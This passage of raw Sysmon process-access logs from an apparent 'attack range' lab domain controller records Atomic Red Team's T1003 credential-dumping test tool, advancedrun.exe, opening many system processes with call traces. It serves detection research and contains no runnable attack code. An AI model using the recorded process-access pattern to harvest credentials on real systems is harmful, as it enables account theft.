atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967393Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967392Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.316{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967391Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program 
Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967390Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.316{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967389Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967388Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967387Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003967386Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967385Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967384Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.316{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967383Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.316{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967382Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967381Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.316{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967379Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967378Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.300{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967377Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.300{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967376Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.300{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C: